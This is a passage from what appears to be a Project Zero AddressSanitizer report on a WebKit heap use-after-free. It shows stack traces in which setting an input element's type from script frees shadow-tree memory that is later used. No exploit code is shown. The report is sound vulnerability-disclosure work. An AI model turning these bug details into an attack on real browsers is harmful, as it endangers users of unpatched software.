JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf07aa3)\r\n #17 0x1058f5991 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9991)\r\n #18 0x1058f5abb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9abb)\r\n #19 0x1058f5e06 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9e06)\r\n #20 0x109f3ab2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x10b2b2e)\r\n #21 0x10a220786 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1398786)\r\n #22 0x10977ba05 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f3a05)\r\n #23 0x10977b52f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f352f)\r\n #24 0x109744b35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bcb35)\r\n #25 0x109745c83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bdc83)\r\n #26 0x1097456aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bd6aa)\r\n #27 0x109679b62 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7f1b62)\r\n #28 0x109588aef in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x700aef)\r\n #29 0x10958388e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6fb88e)\r\n #30 0x1098ef3a1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa673a1)\r\n #31 0x1098ec8da in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa648da)\r\n #32 0x1095a10ad in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7190ad)\r\n #33 0x109a9b79d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1379d)\r\n #34 0x10963624c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae24c)\r\n 
#35 0x1095fa86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)\r\n #36 0x1096028f5 in WebCore::DocumentLoader::maybeLoadEmpty() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77a8f5)\r\n #37 0x109602cd7 in WebCore::DocumentLoader::startLoadingMainResource() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77acd7)\r\n #38 0x1098f73a9 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WebCore::FormState*, bool, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6f3a9)\r\n #39 0x10ae11275 in std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>::operator()(WebCore::ResourceRequest const&, WebCore::FormState*, bool) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f89275)\r\n #40 0x10ae110cf in WebCore::PolicyCallback::call(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f890cf)\r\n #41 0x10ae12a6a in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f8aa6a)\r\n #42 0x101bc15ee in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5ac5ee)\r\n #43 0x101bc1446 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5ac446)\r\n #44 0x101bd181c in 
WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5bc81c)\r\n #45 0x10ae1242a in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WebCore::FormState*, std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f8a42a)\r\n #46 0x1098f6208 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6e208)\r\n #47 0x1098f4eed in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6ceed)\r\n #48 0x1098f1c39 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WebCore::FormState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa69c39)\r\n #49 0x1098f0210 in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa68210)\r\n #50 0x101bd8805 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement*, WTF::String const&, bool, int, int) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5c3805)\r\n #51 0x10b67e168 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f6168)\r\n #52 0x10b67c175 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f4175)\r\n #53 0x10b67bd87 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f3d87)\r\n #54 0x109ae195c in WebCore::HTMLFrameElementBase::openURL(WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc5995c)\r\n #55 0x10921edb8 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396db8)\r\n #56 0x10921d69a in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x39569a)\r\n #57 0x109a7309c in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbeb09c)\r\n #58 0x109a6c007 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe4007)\r\n #59 0x109a9cd48 in 
WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)\r\n #60 0x109a9c902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)\r\n #61 0x109a9bb94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)\r\n #62 0x109a9d58d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)\r\n #63 0x10950a661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)\r\n #64 0x1096361f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)\r\n #65 0x1095fa86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)\r\n #66 0x1090dafb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)\r\n #67 0x1090d5b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)\r\n #68 0x10b6867e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)\r\n #69 0x101ef3615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, 
WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
    #70 0x101ef2c2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
    #71 0x1018a11f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
    #72 0x1016c4448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
    #73 0x1016cd614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
    #74 0x106bb2a04 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6a04)
    #75 0x106bb4f1e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b8f1e)
    #76 0x7fff9632c7e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
    #77 0x7fff9630bf1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)
    #78 0x7fff9630b43e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)
    #79 0x7fff9630ae37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
    #80 0x7fff8c19a934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
    #81 0x7fff8c19a76e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
    #82 0x7fff8c19a5ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
    #83 0x7fff89fc5df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
    #84 0x7fff89fc5225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
    #85 0x7fff89fb9d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
    #86 0x7fff89f83367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
    #87 0x7fff82345193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
    #88 0x7fff82343bbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
    #89 0x1015fcb73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
    #90 0x7fff89ec35ac in start (/usr/lib/system/libdyld.dylib+0x35ac)

0x60800005a3b4 is located 20 bytes inside of 96-byte region [0x60800005a3a0,0x60800005a400)
freed by thread T0 here:
    #0 0x103bcfcf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
    #1 0x106bfd36f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190136f)
    #2 0x10b85d0cb in WTF::RefPtr<WebCore::TextControlInnerTextElement>::operator=(std::nullptr_t) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29d50cb)
    #3 0x10b85cfd9 in WebCore::TextFieldInputType::destroyShadowSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29d4fd9)
    #4 0x109af255f in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc6a55f)
    #5 0x109af3972 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc6b972)
    #6 0x109710bff in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x888bff)
    #7 0x10971ef61 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x896f61)
    #8 0x109710698 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x888698)
    #9 0x10a379db6 in WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14f1db6)
    #10 0x10a370eef in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14e8eef)
    #11 0x105a0ab58 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70eb58)
    #12 0x105a0ac85 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70ec85)
    #13 0x1063edf95 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x10f1f95)
    #14 0x1065a2223 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a6223)
    #15 0x1065bdbfd in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c1bfd)
    #16 0x1065c126c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
    #17 0x1065ba83a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)
    #18 0x10627947d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)
    #19 0x106203aa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallDat